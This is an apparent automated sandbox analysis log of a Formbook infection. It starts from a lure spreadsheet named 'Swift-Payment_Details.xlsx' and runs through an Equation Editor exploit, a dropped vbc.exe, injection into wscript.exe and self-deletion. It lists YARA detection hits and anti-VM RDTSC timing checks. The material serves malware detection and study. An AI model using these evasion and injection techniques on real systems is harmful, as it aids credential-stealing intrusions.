          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02430C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0242FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02431D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_000881D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00088280 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00088300 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_000883B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00088222 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_000883AA NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0040102E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B8FB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C6C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C70
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B57A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D88
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C58A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0096E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0099D005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0098905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00973040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0096E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A11238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009963DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0096F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00972305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00977353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009BA37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00981489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009A5485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0098C5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00974680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097E6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A12622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009F579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097C7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009A57C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A0F8EE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097C85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0099286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009729B2
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A1098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009869FE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009F5955
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A23A83
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A1CBA4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0096FBD7
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009FDBDA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024E1238
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0243E2E9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02447353
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0248A37B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02442305
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0243F3CF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024663DB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02443040
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0245905A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0246D005
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0243E0C6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024E2622
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0244E6C1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02444680
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024757C3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024C579A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0244C7BC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02475485
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02451489
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0244351F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0245C5F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024F3A83
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02467B00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0243FBD7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024CDBDA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024ECBA4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0244C85C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0246286D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024DF8EE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024C5955
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024569FE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024E098E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024429B2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0245EE4C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02472E2F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0246DF7C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02450F3F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0244CD5B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02470D3B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024DFDDD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008B57A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008C58A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008B8FB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00078C6C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00078C70
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00072D88
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00072D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00072FB0
          Source: Swift-Payment_Details.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 009B3F92 appears 71 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009B373B appears 177 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0096DF5C appears 83 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0096E2A8 appears 31 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009DF970 appears 59 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0243E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0248373B appears 238 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 02483F92 appears 108 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0243DF5C appears 107 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 024AF970 appears 81 times
          Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/13@6/6
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Swift-Payment_Details.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF42D.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Swift-Payment_Details.xlsxReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Swift-Payment_Details.xlsxStatic file information: File size 1326080 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wscript.exe
          Source: Binary string: wscript.pdb source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp
          Source: Binary string: wscript.pdbN source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp
          Source: Swift-Payment_Details.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Swift-Payment_Details.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 7.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004062F6 pushfd ; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3C5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004153FC push eax; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B47C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B412 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B41B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415CE7 pushad ; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C4EE push 133511A3h; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00414D71 push ss; iretd
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415D38 pushad ; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0243DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_000762F6 pushfd ; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_000853FC push eax; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008B41B push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008B412 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008B47C push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008C4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00085CE7 pushad ; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00085D38 pushad ; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00084D71 push ss; iretd
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Swift-Payment_Details.xlsxStream path 'EncryptedPackage' entropy: 7.99889031885 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000000785F4 second address: 00000000000785FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 000000000007898E second address: 0000000000078994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088C0 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 552Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 2632Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: explorer.exe, 00000008.00000000.2187955907.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2170082366.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2170546852.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2170082366.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.2187992408.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B30 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_002606DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 6_2_002608EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 6_2_002609DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0026099F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00260A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009726F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_024426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeProcess token adjusted: Debug

